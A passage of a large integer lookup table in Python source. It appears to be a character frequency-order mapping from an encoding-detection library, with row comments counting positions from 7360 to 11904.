7660,7661,7662,7663,7664,7665,7666,7667,7668,7669,7670,4453,7671,7672,7673,7674, # 7360
7675,7676,7677,7678,7679,7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690, # 7376
7691,7692,7693,7694,7695,7696,7697,3443,7698,7699,7700,7701,7702,4454,7703,7704, # 7392
7705,7706,7707,7708,7709,7710,7711,7712,7713,2472,7714,7715,7716,7717,7718,7719, # 7408
7720,7721,7722,7723,7724,7725,7726,7727,7728,7729,7730,7731,3954,7732,7733,7734, # 7424
7735,7736,7737,7738,7739,7740,7741,7742,7743,7744,7745,7746,7747,7748,7749,7750, # 7440
3134,7751,7752,4852,7753,7754,7755,4853,7756,7757,7758,7759,7760,4174,7761,7762, # 7456
7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,7777,7778, # 7472
7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,7792,7793,7794, # 7488
7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,4854,7806,7807,7808,7809, # 7504
7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824,7825, # 7520
4855,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7536
7841,7842,7843,7844,7845,7846,7847,3955,7848,7849,7850,7851,7852,7853,7854,7855, # 7552
7856,7857,7858,7859,7860,3444,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870, # 7568
7871,7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886, # 7584
7887,7888,7889,7890,7891,4175,7892,7893,7894,7895,7896,4856,4857,7897,7898,7899, # 7600
7900,2598,7901,7902,7903,7904,7905,7906,7907,7908,4455,7909,7910,7911,7912,7913, # 7616
7914,3201,7915,7916,7917,7918,7919,7920,7921,4858,7922,7923,7924,7925,7926,7927, # 7632
7928,7929,7930,7931,7932,7933,7934,7935,7936,7937,7938,7939,7940,7941,7942,7943, # 7648
7944,7945,7946,7947,7948,7949,7950,7951,7952,7953,7954,7955,7956,7957,7958,7959, # 7664
7960,7961,7962,7963,7964,7965,7966,7967,7968,7969,7970,7971,7972,7973,7974,7975, # 7680
7976,7977,7978,7979,7980,7981,4859,7982,7983,7984,7985,7986,7987,7988,7989,7990, # 7696
7991,7992,7993,7994,7995,7996,4860,7997,7998,7999,8000,8001,8002,8003,8004,8005, # 7712
8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,4176,8017,8018,8019,8020, # 7728
8021,8022,8023,4861,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035, # 7744
8036,4862,4456,8037,8038,8039,8040,4863,8041,8042,8043,8044,8045,8046,8047,8048, # 7760
8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064, # 7776
8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080, # 7792
8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096, # 7808
8097,8098,8099,4864,4177,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110, # 7824
8111,8112,8113,8114,8115,8116,8117,8118,8119,8120,4178,8121,8122,8123,8124,8125, # 7840
8126,8127,8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141, # 7856
8142,8143,8144,8145,4865,4866,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155, # 7872
8156,8157,8158,8159,8160,8161,8162,8163,8164,8165,4179,8166,8167,8168,8169,8170, # 7888
8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181,4457,8182,8183,8184,8185, # 7904
8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201, # 7920
8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213,8214,8215,8216,8217, # 7936
8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229,8230,8231,8232,8233, # 7952
8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245,8246,8247,8248,8249, # 7968
8250,8251,8252,8253,8254,8255,8256,3445,8257,8258,8259,8260,8261,8262,4458,8263, # 7984
8264,8265,8266,8267,8268,8269,8270,8271,8272,4459,8273,8274,8275,8276,3550,8277, # 8000
8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,4460,8290,8291,8292, # 8016
8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,4867, # 8032
8308,8309,8310,8311,8312,3551,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322, # 8048
8323,8324,8325,8326,4868,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337, # 8064
8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353, # 8080
8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,4869,4461,8364,8365,8366,8367, # 8096
8368,8369,8370,4870,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382, # 8112
8383,8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398, # 8128
8399,8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,4871,8411,8412,8413, # 8144
8414,8415,8416,8417,8418,8419,8420,8421,8422,4462,8423,8424,8425,8426,8427,8428, # 8160
8429,8430,8431,8432,8433,2986,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443, # 8176
8444,8445,8446,8447,8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459, # 8192
8460,8461,8462,8463,8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475, # 8208
8476,8477,8478,4180,8479,8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490, # 8224
8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506, # 8240
8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522, # 8256
8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538, # 8272
8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554, # 8288
8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,4872,8565,8566,8567,8568,8569, # 8304
8570,8571,8572,8573,4873,8574,8575,8576,8577,8578,8579,8580,8581,8582,8583,8584, # 8320
8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597,8598,8599,8600, # 8336
8601,8602,8603,8604,8605,3803,8606,8607,8608,8609,8610,8611,8612,8613,4874,3804, # 8352
8614,8615,8616,8617,8618,8619,8620,8621,3956,8622,8623,8624,8625,8626,8627,8628, # 8368
8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,2865,8639,8640,8641,8642,8643, # 8384
8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,4463,8657,8658, # 8400
8659,4875,4876,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672, # 8416
8673,8674,8675,8676,8677,8678,8679,8680,8681,4464,8682,8683,8684,8685,8686,8687, # 8432
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703, # 8448
8704,8705,8706,8707,8708,8709,2261,8710,8711,8712,8713,8714,8715,8716,8717,8718, # 8464
8719,8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,4181, # 8480
8734,8735,8736,8737,8738,8739,8740,8741,8742,8743,8744,8745,8746,8747,8748,8749, # 8496
8750,8751,8752,8753,8754,8755,8756,8757,8758,8759,8760,8761,8762,8763,4877,8764, # 8512
8765,8766,8767,8768,8769,8770,8771,8772,8773,8774,8775,8776,8777,8778,8779,8780, # 8528
8781,8782,8783,8784,8785,8786,8787,8788,4878,8789,4879,8790,8791,8792,4880,8793, # 8544
8794,8795,8796,8797,8798,8799,8800,8801,4881,8802,8803,8804,8805,8806,8807,8808, # 8560
8809,8810,8811,8812,8813,8814,8815,3957,8816,8817,8818,8819,8820,8821,8822,8823, # 8576
8824,8825,8826,8827,8828,8829,8830,8831,8832,8833,8834,8835,8836,8837,8838,8839, # 8592
8840,8841,8842,8843,8844,8845,8846,8847,4882,8848,8849,8850,8851,8852,8853,8854, # 8608
8855,8856,8857,8858,8859,8860,8861,8862,8863,8864,8865,8866,8867,8868,8869,8870, # 8624
8871,8872,8873,8874,8875,8876,8877,8878,8879,8880,8881,8882,8883,8884,3202,8885, # 8640
8886,8887,8888,8889,8890,8891,8892,8893,8894,8895,8896,8897,8898,8899,8900,8901, # 8656
8902,8903,8904,8905,8906,8907,8908,8909,8910,8911,8912,8913,8914,8915,8916,8917, # 8672
8918,8919,8920,8921,8922,8923,8924,4465,8925,8926,8927,8928,8929,8930,8931,8932, # 8688
4883,8933,8934,8935,8936,8937,8938,8939,8940,8941,8942,8943,2214,8944,8945,8946, # 8704
8947,8948,8949,8950,8951,8952,8953,8954,8955,8956,8957,8958,8959,8960,8961,8962, # 8720
8963,8964,8965,4884,8966,8967,8968,8969,8970,8971,8972,8973,8974,8975,8976,8977, # 8736
8978,8979,8980,8981,8982,8983,8984,8985,8986,8987,8988,8989,8990,8991,8992,4885, # 8752
8993,8994,8995,8996,8997,8998,8999,9000,9001,9002,9003,9004,9005,9006,9007,9008, # 8768
9009,9010,9011,9012,9013,9014,9015,9016,9017,9018,9019,9020,9021,4182,9022,9023, # 8784
9024,9025,9026,9027,9028,9029,9030,9031,9032,9033,9034,9035,9036,9037,9038,9039, # 8800
9040,9041,9042,9043,9044,9045,9046,9047,9048,9049,9050,9051,9052,9053,9054,9055, # 8816
9056,9057,9058,9059,9060,9061,9062,9063,4886,9064,9065,9066,9067,9068,9069,4887, # 8832
9070,9071,9072,9073,9074,9075,9076,9077,9078,9079,9080,9081,9082,9083,9084,9085, # 8848
9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9101, # 8864
9102,9103,9104,9105,9106,9107,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117, # 8880
9118,9119,9120,9121,9122,9123,9124,9125,9126,9127,9128,9129,9130,9131,9132,9133, # 8896
9134,9135,9136,9137,9138,9139,9140,9141,3958,9142,9143,9144,9145,9146,9147,9148, # 8912
9149,9150,9151,4888,9152,9153,9154,9155,9156,9157,9158,9159,9160,9161,9162,9163, # 8928
9164,9165,9166,9167,9168,9169,9170,9171,9172,9173,9174,9175,4889,9176,9177,9178, # 8944
9179,9180,9181,9182,9183,9184,9185,9186,9187,9188,9189,9190,9191,9192,9193,9194, # 8960
9195,9196,9197,9198,9199,9200,9201,9202,9203,4890,9204,9205,9206,9207,9208,9209, # 8976
9210,9211,9212,9213,9214,9215,9216,9217,9218,9219,9220,9221,9222,4466,9223,9224, # 8992
9225,9226,9227,9228,9229,9230,9231,9232,9233,9234,9235,9236,9237,9238,9239,9240, # 9008
9241,9242,9243,9244,9245,4891,9246,9247,9248,9249,9250,9251,9252,9253,9254,9255, # 9024
9256,9257,4892,9258,9259,9260,9261,4893,4894,9262,9263,9264,9265,9266,9267,9268, # 9040
9269,9270,9271,9272,9273,4467,9274,9275,9276,9277,9278,9279,9280,9281,9282,9283, # 9056
9284,9285,3673,9286,9287,9288,9289,9290,9291,9292,9293,9294,9295,9296,9297,9298, # 9072
9299,9300,9301,9302,9303,9304,9305,9306,9307,9308,9309,9310,9311,9312,9313,9314, # 9088
9315,9316,9317,9318,9319,9320,9321,9322,4895,9323,9324,9325,9326,9327,9328,9329, # 9104
9330,9331,9332,9333,9334,9335,9336,9337,9338,9339,9340,9341,9342,9343,9344,9345, # 9120
9346,9347,4468,9348,9349,9350,9351,9352,9353,9354,9355,9356,9357,9358,9359,9360, # 9136
9361,9362,9363,9364,9365,9366,9367,9368,9369,9370,9371,9372,9373,4896,9374,4469, # 9152
9375,9376,9377,9378,9379,4897,9380,9381,9382,9383,9384,9385,9386,9387,9388,9389, # 9168
9390,9391,9392,9393,9394,9395,9396,9397,9398,9399,9400,9401,9402,9403,9404,9405, # 9184
9406,4470,9407,2751,9408,9409,3674,3552,9410,9411,9412,9413,9414,9415,9416,9417, # 9200
9418,9419,9420,9421,4898,9422,9423,9424,9425,9426,9427,9428,9429,3959,9430,9431, # 9216
9432,9433,9434,9435,9436,4471,9437,9438,9439,9440,9441,9442,9443,9444,9445,9446, # 9232
9447,9448,9449,9450,3348,9451,9452,9453,9454,9455,9456,9457,9458,9459,9460,9461, # 9248
9462,9463,9464,9465,9466,9467,9468,9469,9470,9471,9472,4899,9473,9474,9475,9476, # 9264
9477,4900,9478,9479,9480,9481,9482,9483,9484,9485,9486,9487,9488,3349,9489,9490, # 9280
9491,9492,9493,9494,9495,9496,9497,9498,9499,9500,9501,9502,9503,9504,9505,9506, # 9296
9507,9508,9509,9510,9511,9512,9513,9514,9515,9516,9517,9518,9519,9520,4901,9521, # 9312
9522,9523,9524,9525,9526,4902,9527,9528,9529,9530,9531,9532,9533,9534,9535,9536, # 9328
9537,9538,9539,9540,9541,9542,9543,9544,9545,9546,9547,9548,9549,9550,9551,9552, # 9344
9553,9554,9555,9556,9557,9558,9559,9560,9561,9562,9563,9564,9565,9566,9567,9568, # 9360
9569,9570,9571,9572,9573,9574,9575,9576,9577,9578,9579,9580,9581,9582,9583,9584, # 9376
3805,9585,9586,9587,9588,9589,9590,9591,9592,9593,9594,9595,9596,9597,9598,9599, # 9392
9600,9601,9602,4903,9603,9604,9605,9606,9607,4904,9608,9609,9610,9611,9612,9613, # 9408
9614,4905,9615,9616,9617,9618,9619,9620,9621,9622,9623,9624,9625,9626,9627,9628, # 9424
9629,9630,9631,9632,4906,9633,9634,9635,9636,9637,9638,9639,9640,9641,9642,9643, # 9440
4907,9644,9645,9646,9647,9648,9649,9650,9651,9652,9653,9654,9655,9656,9657,9658, # 9456
9659,9660,9661,9662,9663,9664,9665,9666,9667,9668,9669,9670,9671,9672,4183,9673, # 9472
9674,9675,9676,9677,4908,9678,9679,9680,9681,4909,9682,9683,9684,9685,9686,9687, # 9488
9688,9689,9690,4910,9691,9692,9693,3675,9694,9695,9696,2945,9697,9698,9699,9700, # 9504
9701,9702,9703,9704,9705,4911,9706,9707,9708,9709,9710,9711,9712,9713,9714,9715, # 9520
9716,9717,9718,9719,9720,9721,9722,9723,9724,9725,9726,9727,9728,9729,9730,9731, # 9536
9732,9733,9734,9735,4912,9736,9737,9738,9739,9740,4913,9741,9742,9743,9744,9745, # 9552
9746,9747,9748,9749,9750,9751,9752,9753,9754,9755,9756,9757,9758,4914,9759,9760, # 9568
9761,9762,9763,9764,9765,9766,9767,9768,9769,9770,9771,9772,9773,9774,9775,9776, # 9584
9777,9778,9779,9780,9781,9782,4915,9783,9784,9785,9786,9787,9788,9789,9790,9791, # 9600
9792,9793,4916,9794,9795,9796,9797,9798,9799,9800,9801,9802,9803,9804,9805,9806, # 9616
9807,9808,9809,9810,9811,9812,9813,9814,9815,9816,9817,9818,9819,9820,9821,9822, # 9632
9823,9824,9825,9826,9827,9828,9829,9830,9831,9832,9833,9834,9835,9836,9837,9838, # 9648
9839,9840,9841,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852,9853,9854, # 9664
9855,9856,9857,9858,9859,9860,9861,9862,9863,9864,9865,9866,9867,9868,4917,9869, # 9680
9870,9871,9872,9873,9874,9875,9876,9877,9878,9879,9880,9881,9882,9883,9884,9885, # 9696
9886,9887,9888,9889,9890,9891,9892,4472,9893,9894,9895,9896,9897,3806,9898,9899, # 9712
9900,9901,9902,9903,9904,9905,9906,9907,9908,9909,9910,9911,9912,9913,9914,4918, # 9728
9915,9916,9917,4919,9918,9919,9920,9921,4184,9922,9923,9924,9925,9926,9927,9928, # 9744
9929,9930,9931,9932,9933,9934,9935,9936,9937,9938,9939,9940,9941,9942,9943,9944, # 9760
9945,9946,4920,9947,9948,9949,9950,9951,9952,9953,9954,9955,4185,9956,9957,9958, # 9776
9959,9960,9961,9962,9963,9964,9965,4921,9966,9967,9968,4473,9969,9970,9971,9972, # 9792
9973,9974,9975,9976,9977,4474,9978,9979,9980,9981,9982,9983,9984,9985,9986,9987, # 9808
9988,9989,9990,9991,9992,9993,9994,9995,9996,9997,9998,9999,10000,10001,10002,10003, # 9824
10004,10005,10006,10007,10008,10009,10010,10011,10012,10013,10014,10015,10016,10017,10018,10019, # 9840
10020,10021,4922,10022,4923,10023,10024,10025,10026,10027,10028,10029,10030,10031,10032,10033, # 9856
10034,10035,10036,10037,10038,10039,10040,10041,10042,10043,10044,10045,10046,10047,10048,4924, # 9872
10049,10050,10051,10052,10053,10054,10055,10056,10057,10058,10059,10060,10061,10062,10063,10064, # 9888
10065,10066,10067,10068,10069,10070,10071,10072,10073,10074,10075,10076,10077,10078,10079,10080, # 9904
10081,10082,10083,10084,10085,10086,10087,4475,10088,10089,10090,10091,10092,10093,10094,10095, # 9920
10096,10097,4476,10098,10099,10100,10101,10102,10103,10104,10105,10106,10107,10108,10109,10110, # 9936
10111,2174,10112,10113,10114,10115,10116,10117,10118,10119,10120,10121,10122,10123,10124,10125, # 9952
10126,10127,10128,10129,10130,10131,10132,10133,10134,10135,10136,10137,10138,10139,10140,3807, # 9968
4186,4925,10141,10142,10143,10144,10145,10146,10147,4477,4187,10148,10149,10150,10151,10152, # 9984
10153,4188,10154,10155,10156,10157,10158,10159,10160,10161,4926,10162,10163,10164,10165,10166, #10000
10167,10168,10169,10170,10171,10172,10173,10174,10175,10176,10177,10178,10179,10180,10181,10182, #10016
10183,10184,10185,10186,10187,10188,10189,10190,10191,10192,3203,10193,10194,10195,10196,10197, #10032
10198,10199,10200,4478,10201,10202,10203,10204,4479,10205,10206,10207,10208,10209,10210,10211, #10048
10212,10213,10214,10215,10216,10217,10218,10219,10220,10221,10222,10223,10224,10225,10226,10227, #10064
10228,10229,10230,10231,10232,10233,10234,4927,10235,10236,10237,10238,10239,10240,10241,10242, #10080
10243,10244,10245,10246,10247,10248,10249,10250,10251,10252,10253,10254,10255,10256,10257,10258, #10096
10259,10260,10261,10262,10263,10264,10265,10266,10267,10268,10269,10270,10271,10272,10273,4480, #10112
4928,4929,10274,10275,10276,10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287, #10128
10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298,10299,10300,10301,10302,10303, #10144
10304,10305,10306,10307,10308,10309,10310,10311,10312,10313,10314,10315,10316,10317,10318,10319, #10160
10320,10321,10322,10323,10324,10325,10326,10327,10328,10329,10330,10331,10332,10333,10334,4930, #10176
10335,10336,10337,10338,10339,10340,10341,10342,4931,10343,10344,10345,10346,10347,10348,10349, #10192
10350,10351,10352,10353,10354,10355,3088,10356,2786,10357,10358,10359,10360,4189,10361,10362, #10208
10363,10364,10365,10366,10367,10368,10369,10370,10371,10372,10373,10374,10375,4932,10376,10377, #10224
10378,10379,10380,10381,10382,10383,10384,10385,10386,10387,10388,10389,10390,10391,10392,4933, #10240
10393,10394,10395,4934,10396,10397,10398,10399,10400,10401,10402,10403,10404,10405,10406,10407, #10256
10408,10409,10410,10411,10412,3446,10413,10414,10415,10416,10417,10418,10419,10420,10421,10422, #10272
10423,4935,10424,10425,10426,10427,10428,10429,10430,4936,10431,10432,10433,10434,10435,10436, #10288
10437,10438,10439,10440,10441,10442,10443,4937,10444,10445,10446,10447,4481,10448,10449,10450, #10304
10451,10452,10453,10454,10455,10456,10457,10458,10459,10460,10461,10462,10463,10464,10465,10466, #10320
10467,10468,10469,10470,10471,10472,10473,10474,10475,10476,10477,10478,10479,10480,10481,10482, #10336
10483,10484,10485,10486,10487,10488,10489,10490,10491,10492,10493,10494,10495,10496,10497,10498, #10352
10499,10500,10501,10502,10503,10504,10505,4938,10506,10507,10508,10509,10510,2552,10511,10512, #10368
10513,10514,10515,10516,3447,10517,10518,10519,10520,10521,10522,10523,10524,10525,10526,10527, #10384
10528,10529,10530,10531,10532,10533,10534,10535,10536,10537,10538,10539,10540,10541,10542,10543, #10400
4482,10544,4939,10545,10546,10547,10548,10549,10550,10551,10552,10553,10554,10555,10556,10557, #10416
10558,10559,10560,10561,10562,10563,10564,10565,10566,10567,3676,4483,10568,10569,10570,10571, #10432
10572,3448,10573,10574,10575,10576,10577,10578,10579,10580,10581,10582,10583,10584,10585,10586, #10448
10587,10588,10589,10590,10591,10592,10593,10594,10595,10596,10597,10598,10599,10600,10601,10602, #10464
10603,10604,10605,10606,10607,10608,10609,10610,10611,10612,10613,10614,10615,10616,10617,10618, #10480
10619,10620,10621,10622,10623,10624,10625,10626,10627,4484,10628,10629,10630,10631,10632,4940, #10496
10633,10634,10635,10636,10637,10638,10639,10640,10641,10642,10643,10644,10645,10646,10647,10648, #10512
10649,10650,10651,10652,10653,10654,10655,10656,4941,10657,10658,10659,2599,10660,10661,10662, #10528
10663,10664,10665,10666,3089,10667,10668,10669,10670,10671,10672,10673,10674,10675,10676,10677, #10544
10678,10679,10680,4942,10681,10682,10683,10684,10685,10686,10687,10688,10689,10690,10691,10692, #10560
10693,10694,10695,10696,10697,4485,10698,10699,10700,10701,10702,10703,10704,4943,10705,3677, #10576
10706,10707,10708,10709,10710,10711,10712,4944,10713,10714,10715,10716,10717,10718,10719,10720, #10592
10721,10722,10723,10724,10725,10726,10727,10728,4945,10729,10730,10731,10732,10733,10734,10735, #10608
10736,10737,10738,10739,10740,10741,10742,10743,10744,10745,10746,10747,10748,10749,10750,10751, #10624
10752,10753,10754,10755,10756,10757,10758,10759,10760,10761,4946,10762,10763,10764,10765,10766, #10640
10767,4947,4948,10768,10769,10770,10771,10772,10773,10774,10775,10776,10777,10778,10779,10780, #10656
10781,10782,10783,10784,10785,10786,10787,10788,10789,10790,10791,10792,10793,10794,10795,10796, #10672
10797,10798,10799,10800,10801,10802,10803,10804,10805,10806,10807,10808,10809,10810,10811,10812, #10688
10813,10814,10815,10816,10817,10818,10819,10820,10821,10822,10823,10824,10825,10826,10827,10828, #10704
10829,10830,10831,10832,10833,10834,10835,10836,10837,10838,10839,10840,10841,10842,10843,10844, #10720
10845,10846,10847,10848,10849,10850,10851,10852,10853,10854,10855,10856,10857,10858,10859,10860, #10736
10861,10862,10863,10864,10865,10866,10867,10868,10869,10870,10871,10872,10873,10874,10875,10876, #10752
10877,10878,4486,10879,10880,10881,10882,10883,10884,10885,4949,10886,10887,10888,10889,10890, #10768
10891,10892,10893,10894,10895,10896,10897,10898,10899,10900,10901,10902,10903,10904,10905,10906, #10784
10907,10908,10909,10910,10911,10912,10913,10914,10915,10916,10917,10918,10919,4487,10920,10921, #10800
10922,10923,10924,10925,10926,10927,10928,10929,10930,10931,10932,4950,10933,10934,10935,10936, #10816
10937,10938,10939,10940,10941,10942,10943,10944,10945,10946,10947,10948,10949,4488,10950,10951, #10832
10952,10953,10954,10955,10956,10957,10958,10959,4190,10960,10961,10962,10963,10964,10965,10966, #10848
10967,10968,10969,10970,10971,10972,10973,10974,10975,10976,10977,10978,10979,10980,10981,10982, #10864
10983,10984,10985,10986,10987,10988,10989,10990,10991,10992,10993,10994,10995,10996,10997,10998, #10880
10999,11000,11001,11002,11003,11004,11005,11006,3960,11007,11008,11009,11010,11011,11012,11013, #10896
11014,11015,11016,11017,11018,11019,11020,11021,11022,11023,11024,11025,11026,11027,11028,11029, #10912
11030,11031,11032,4951,11033,11034,11035,11036,11037,11038,11039,11040,11041,11042,11043,11044, #10928
11045,11046,11047,4489,11048,11049,11050,11051,4952,11052,11053,11054,11055,11056,11057,11058, #10944
4953,11059,11060,11061,11062,11063,11064,11065,11066,11067,11068,11069,11070,11071,4954,11072, #10960
11073,11074,11075,11076,11077,11078,11079,11080,11081,11082,11083,11084,11085,11086,11087,11088, #10976
11089,11090,11091,11092,11093,11094,11095,11096,11097,11098,11099,11100,11101,11102,11103,11104, #10992
11105,11106,11107,11108,11109,11110,11111,11112,11113,11114,11115,3808,11116,11117,11118,11119, #11008
11120,11121,11122,11123,11124,11125,11126,11127,11128,11129,11130,11131,11132,11133,11134,4955, #11024
11135,11136,11137,11138,11139,11140,11141,11142,11143,11144,11145,11146,11147,11148,11149,11150, #11040
11151,11152,11153,11154,11155,11156,11157,11158,11159,11160,11161,4956,11162,11163,11164,11165, #11056
11166,11167,11168,11169,11170,11171,11172,11173,11174,11175,11176,11177,11178,11179,11180,4957, #11072
11181,11182,11183,11184,11185,11186,4958,11187,11188,11189,11190,11191,11192,11193,11194,11195, #11088
11196,11197,11198,11199,11200,3678,11201,11202,11203,11204,11205,11206,4191,11207,11208,11209, #11104
11210,11211,11212,11213,11214,11215,11216,11217,11218,11219,11220,11221,11222,11223,11224,11225, #11120
11226,11227,11228,11229,11230,11231,11232,11233,11234,11235,11236,11237,11238,11239,11240,11241, #11136
11242,11243,11244,11245,11246,11247,11248,11249,11250,11251,4959,11252,11253,11254,11255,11256, #11152
11257,11258,11259,11260,11261,11262,11263,11264,11265,11266,11267,11268,11269,11270,11271,11272, #11168
11273,11274,11275,11276,11277,11278,11279,11280,11281,11282,11283,11284,11285,11286,11287,11288, #11184
11289,11290,11291,11292,11293,11294,11295,11296,11297,11298,11299,11300,11301,11302,11303,11304, #11200
11305,11306,11307,11308,11309,11310,11311,11312,11313,11314,3679,11315,11316,11317,11318,4490, #11216
11319,11320,11321,11322,11323,11324,11325,11326,11327,11328,11329,11330,11331,11332,11333,11334, #11232
11335,11336,11337,11338,11339,11340,11341,11342,11343,11344,11345,11346,11347,4960,11348,11349, #11248
11350,11351,11352,11353,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365, #11264
11366,11367,11368,11369,11370,11371,11372,11373,11374,11375,11376,11377,3961,4961,11378,11379, #11280
11380,11381,11382,11383,11384,11385,11386,11387,11388,11389,11390,11391,11392,11393,11394,11395, #11296
11396,11397,4192,11398,11399,11400,11401,11402,11403,11404,11405,11406,11407,11408,11409,11410, #11312
11411,4962,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11424,11425, #11328
11426,11427,11428,11429,11430,11431,11432,11433,11434,11435,11436,11437,11438,11439,11440,11441, #11344
11442,11443,11444,11445,11446,11447,11448,11449,11450,11451,11452,11453,11454,11455,11456,11457, #11360
11458,11459,11460,11461,11462,11463,11464,11465,11466,11467,11468,11469,4963,11470,11471,4491, #11376
11472,11473,11474,11475,4964,11476,11477,11478,11479,11480,11481,11482,11483,11484,11485,11486, #11392
11487,11488,11489,11490,11491,11492,4965,11493,11494,11495,11496,11497,11498,11499,11500,11501, #11408
11502,11503,11504,11505,11506,11507,11508,11509,11510,11511,11512,11513,11514,11515,11516,11517, #11424
11518,11519,11520,11521,11522,11523,11524,11525,11526,11527,11528,11529,3962,11530,11531,11532, #11440
11533,11534,11535,11536,11537,11538,11539,11540,11541,11542,11543,11544,11545,11546,11547,11548, #11456
11549,11550,11551,11552,11553,11554,11555,11556,11557,11558,11559,11560,11561,11562,11563,11564, #11472
4193,4194,11565,11566,11567,11568,11569,11570,11571,11572,11573,11574,11575,11576,11577,11578, #11488
11579,11580,11581,11582,11583,11584,11585,11586,11587,11588,11589,11590,11591,4966,4195,11592, #11504
11593,11594,11595,11596,11597,11598,11599,11600,11601,11602,11603,11604,3090,11605,11606,11607, #11520
11608,11609,11610,4967,11611,11612,11613,11614,11615,11616,11617,11618,11619,11620,11621,11622, #11536
11623,11624,11625,11626,11627,11628,11629,11630,11631,11632,11633,11634,11635,11636,11637,11638, #11552
11639,11640,11641,11642,11643,11644,11645,11646,11647,11648,11649,11650,11651,11652,11653,11654, #11568
11655,11656,11657,11658,11659,11660,11661,11662,11663,11664,11665,11666,11667,11668,11669,11670, #11584
11671,11672,11673,11674,4968,11675,11676,11677,11678,11679,11680,11681,11682,11683,11684,11685, #11600
11686,11687,11688,11689,11690,11691,11692,11693,3809,11694,11695,11696,11697,11698,11699,11700, #11616
11701,11702,11703,11704,11705,11706,11707,11708,11709,11710,11711,11712,11713,11714,11715,11716, #11632
11717,11718,3553,11719,11720,11721,11722,11723,11724,11725,11726,11727,11728,11729,11730,4969, #11648
11731,11732,11733,11734,11735,11736,11737,11738,11739,11740,4492,11741,11742,11743,11744,11745, #11664
11746,11747,11748,11749,11750,11751,11752,4970,11753,11754,11755,11756,11757,11758,11759,11760, #11680
11761,11762,11763,11764,11765,11766,11767,11768,11769,11770,11771,11772,11773,11774,11775,11776, #11696
11777,11778,11779,11780,11781,11782,11783,11784,11785,11786,11787,11788,11789,11790,4971,11791, #11712
11792,11793,11794,11795,11796,11797,4972,11798,11799,11800,11801,11802,11803,11804,11805,11806, #11728
11807,11808,11809,11810,4973,11811,11812,11813,11814,11815,11816,11817,11818,11819,11820,11821, #11744
11822,11823,11824,11825,11826,11827,11828,11829,11830,11831,11832,11833,11834,3680,3810,11835, #11760
11836,4974,11837,11838,11839,11840,11841,11842,11843,11844,11845,11846,11847,11848,11849,11850, #11776
11851,11852,11853,11854,11855,11856,11857,11858,11859,11860,11861,11862,11863,11864,11865,11866, #11792
11867,11868,11869,11870,11871,11872,11873,11874,11875,11876,11877,11878,11879,11880,11881,11882, #11808
11883,11884,4493,11885,11886,11887,11888,11889,11890,11891,11892,11893,11894,11895,11896,11897, #11824
11898,11899,11900,11901,11902,11903,11904,11905,11906,11907,11908,11909,11910,11911,11912,11913, #11840
11914,11915,4975,11916,11917,11918,11919,11920,11921,11922,11923,11924,11925,11926,11927,11928, #11856
11929,11930,11931,11932,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11943,11944, #11872
11945,11946,11947,11948,11949,4976,11950,11951,11952,11953,11954,11955,11956,11957,11958,11959, #11888
11960,11961,11962,11963,11964,11965,11966,11967,11968,11969,11970,11971,11972,11973,11974,11975, #11904
